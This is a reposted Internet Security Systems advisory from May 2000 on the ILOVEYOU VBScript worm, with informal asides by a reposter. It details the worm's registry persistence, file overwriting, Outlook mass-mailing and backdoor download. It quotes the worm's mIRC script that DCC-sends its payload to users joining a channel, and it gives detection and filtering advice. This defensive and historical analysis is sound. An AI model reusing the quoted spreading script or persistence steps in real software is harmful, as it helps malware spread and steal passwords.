Internet Security Systems Security Alert
May 4, 2000
"ILOVEYOU" Virus Affects Windows Users
Synopsis:
A dangerous Visual Basic Script (VBScript) virus, dubbed the
"LoveLetter" or
"ILOVEYOU" virus, has been spreading itself across the
Internet through email
via Microsoft Outlook and through Internet Relay Chat (IRC) using
a popular
IRC client named mIRC. The virus is susceptible to activation
whenever the
Windows Script Host features are enabled.
Impact:
Mail servers may incur mild to severe overloading and could crash
when flooded
with an unexpected number of the ILOVEYOU messages. The actual
VBScript code
performs a number of destructive tasks:
- - modifies and creates various Windows registry entries
- - launches Internet Explorer to download a backdoor program
which, once
installed, captures network passwords and emails this data to an
account in
the Philippines
- - infects the local machine by creating many new copies of
itself and
overwriting data files of specific file types (including VBScript,
JavaScript, JPEG, and MP2/MP3)
- - spreads itself to other users by using information from the
Microsoft
Outlook Address Book, as well as mIRC's DCC feature, which allows
chat
participants to exchange files
Description:
Visual Basic Scripts can be executed if Windows Script Host (WSH)
is installed
and enabled. Windows Script Host is installed by default with
Windows 98 and
with Internet Explorer version 4.0 and later.
The message is very identifiable. The subject is always "ILOVEYOU",
and the
body of the email only contains the message "kindly check
the attached
LOVELETTER coming from me." The email contains a single
instance of the virus
in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".
(C0VERTl's note: this should have tipped anyone off with a half-brain, VBS is not a
standard text or doc extension...)
When the attachment is opened, the malicious VBScript code
launches,
performing the following operations in sequence:
- - The virus removes the timeout associated with the Windows
scripting unit by
changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout registry key.
- - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs,
and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.
- - The following registry entries are created under HKEY_LOCAL_MACHINE,
such
that the MSKernel32.vbs and Win32DLL.vbs copies will be launched
at
boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Win32DLL.vbs is created as a service.
- - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for
later use (in the
mIRC script) and placed in the Windows SYSTEMDIR. Typically,
WINDIR is
C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM.
- - The virus attempts to spread itself via e-mail using
Microsoft Outlook. It
sends a message to all addresses found in every address book.
Each
individual is flagged in the registry after they have been sent a
copy.
For each address list that is found, a counter is kept in the
registry to
track the number of users that have been mailed. The number of
email addresses
in the address list is also recorded. If the number of addresses
in the list
increases, the virus will enumerate the individuals again and
send out the
"ILOVEYOU" mail to those who have not previously
received it.
All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.
- - The virus uses Internet Explorer to connect one of four HTTP
web locations
in an attempt to download a backdoor program called WIN-BUGSFIX.EXE.
This
backdoor program captures any network passwords it identifies and
automatically emails this information to a mail account in the
Philippines,
presumably controlled by the author of the virus.
Before Internet Explorer is launched, the following registry
entry, which sets
the Internet Explorer start page, is changed to one of four URLs
at random:
\Software\Microsoft\Internet Explorer\Main\Start Page
After the executable is downloaded, the start page value is set
to
"about:blank".
- - The following registry entry is created (under HKEY_LOCAL_MACHINE)
to launch
WIN-BUGSFIX.EXE at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
- - The virus identifies any "Fixed" or "Removable"
drives connected to the
system and recursively visits each folder, overwriting files of
any of the
following extensions with a copy of itself, changing the
extension to ".vbs"
and deleting the original file:
vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application
The virus deletes any .jpg and .jpeg compressed image files, and
replaces by a
copy of the virus with ".vbs" appended to the end of
the original file name.
Original copies of any MP3 or MP2 audio files found are preserved,
but a copy
of the virus is created using the same file name with ".vbs"
appended. The
original MP2/MP3 file's attributes will be changed so the file is
hidden.
- - If any of the files "mirc32.exe", "mlink32.exe",
"mirc.ini", "script.ini",
or "mirc.hlp" are found, a new default initialization
script named
"script.ini" is created in the same directory:
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly.
thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
This script will attempt to send a copy of the pre-generated HTML
page to any
user who is seen joining any channel you are in on IRC.
Recommendations:
Everyone should obtain and install the latest virus definition
files for their
virus scanning software. Mail administrators should filter out
any email that
has a .VBS attachment, or at least any mail with a subject line
of
"ILOVEYOU".
ISS RealSecure can be configured to detect the ILOVEYOU virus by
creating a
new User Defined Event. Set the priority to HIGH, and the context
to
Email_Content. Set the search string to "kindly check the
attached LOVELETTER
coming from me". Select the actions to RSKILL, and any
additional action you
would like. This should stop any incoming email containing the
virus from
being delivered to an SMTP server.
(C0VERTl's Note: The old simple solution could save your ass, NEVER open attached files from
strangers. And be suspicious of attached files from friends that you did not request. Always check the
file extension as well. Its amazing so many 'experts' fell for this so called virus.)
Trend Micro's instructions for removing the virus from your
system can be
found at
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER.
Additional Information:
For more information on the ILOVEYOU virus, visit the following
web sites:
http://europe.datafellows.com/v-descs/love.htm
http://vil.mcafee.com/dispVirus.asp?virus_k=98617
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER
_______
About Internet Security Systems (ISS)
Internet Security Systems (ISS) is a leading global provider of
security
management solutions for the Internet. By providing industry-leading
SAFEsuite
security software, remote managed security services, and
strategic consulting
and education offerings, ISS is a trusted security provider to
its customers,
protecting digital assets and ensuring safe and uninterrupted e-business.
ISS'
security management solutions protect more than 5,500 customers
worldwide
including 21 of the 25 largest U.S. commercial banks, 10 of the
largest
telecommunications companies and over 35 government agencies.
Founded in 1994,
ISS is headquartered in Atlanta, GA, with additional offices
throughout North
America and international operations in Asia, Australia, Europe,
Latin America
and the Middle East. For more information, visit the Internet
Security Systems
web site at www.iss.net or call 888-901-7477.
Copyright (c) 2000 by Internet Security Systems, Inc.